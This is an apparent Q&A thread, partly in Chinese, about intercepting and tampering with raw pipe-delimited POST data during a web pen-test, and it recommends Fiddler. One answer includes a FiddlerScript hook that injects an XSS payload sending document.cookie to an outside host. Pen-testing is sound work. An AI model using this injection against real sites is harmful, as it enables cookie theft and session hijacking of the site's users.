1

I'm trying to pen-test the web app, that consumes the POST request containing the raw data like this:

1|2|3|4|1|5|6|5|7|8|1|9|21|10|11|12|13|11|14|15|16|42|17|11|18|19|16|489|20|16|618|21|16|193|22|11|23|8|11|24|25|11|26|27|16|340|28|11|29|30|11|31|32|16|378|33|-7|34|11|35|36|16|130|37|16|55|38|-7|39|11|40|41|42|1|7|8|1|9|21|10|11|43|13|11|44|15|16|34|17|11|45|19|16|1058|20|16|480|21|16|190|22|11|46|8|11|47|25|11|48|27|16|322|28|11|49|30|-32|32|16|220|33|-28|34|-25|36|16|134|37|16|48|38|-28|39|-32|41|-22|7|8|1|9|21|10|11|50|13|11|51|15|16|33|17|11|52|19|16|934|20|16|669|21|16|185|22|11|53|8|11|54|25|11|55|27|16|98|28|11|56|30|-16|32|16|84|33|-45|34|11|57|36|16|139|37|16|49|38|11|58|39|11|59|41|-22|7|8|1|9|21|10|11|60|13|11|61|15|16|53|17|11|62|19|16|695|20|16|614|21|16|177|22|-49|8|11|63|25|11|64|27|16|131|28|11|65|30|-16|32|16|56|33|-65|34|11|66|36|16|151|37|-6|38|-65|39|-59|41|-22|7|8|1|9|21|10|11|67|13|11|68|15|16|40|17|11|69|19|16|197|20|16|147|21|16|110|22|11|70|8|11|71|25|11|72|27|16|341|28|11|73|30|-16|32|16|339|33|-81|34|11|74|36|16|133|37|16|20|38|-81|39|11|75|41|-22|

I.e. all POST data can't be separated into parameters and values like Tamper Data handles them. That makes the plugin very unfriendly to dealing with such kind of POST data. I even can't go to the main Tamper data screen and copy the raw data from requests history list since the screen is blocked by the lesser screen handling the current http request. Thus, I can access and copy the raw data only when the request is already declined or sent without required modification.

Is there the similar tools (browser plugins, http proxies), or at least source code of tamper data that can be used to work and modify of such kind of post data in a manner Tamper Data does?

4

2 回答 2

2

试试Fiddler,它可以让你拦截和篡改原始请求。

于 2013-06-12T22:10:44.110 回答
0

最合适的方法是使用 Fiddlerscript(下载到 Fiddlerscript Editor http://fiddler2.com/fiddlerscript-editor,它会在启动后打开所需的文件)。

我已经定制了

static function OnBeforeRequest(oSession: Session) {

    if (m_Replace16) {
        var post_body: String = oSession.GetRequestBodyAsString();
        FiddlerApplication.Log.LogString(post_body);
        post_body=post_body.Replace("|8888","|<script>img = new Image(); img.src = \"http://httpz.ru/n22ref260pd.gif?\"+document.cookie;</script>");
        FiddlerApplication.Log.LogString(post_body);
        oSession.utilSetRequestBody(post_body);
    }

即添加了一个新的菜单项,该菜单项强制修改所有输出请求,即“|8888”被第二个参数替换,即注入。

第一行将请求正文转换为字符串 var

第二行将其发布到提琴手日志

第三行将所需值替换为某些注入

第四行将修改后的 var 正文发布到日志

第五行用修改后的一个更新原始请求原始正文

于 2013-06-26T18:43:49.687 回答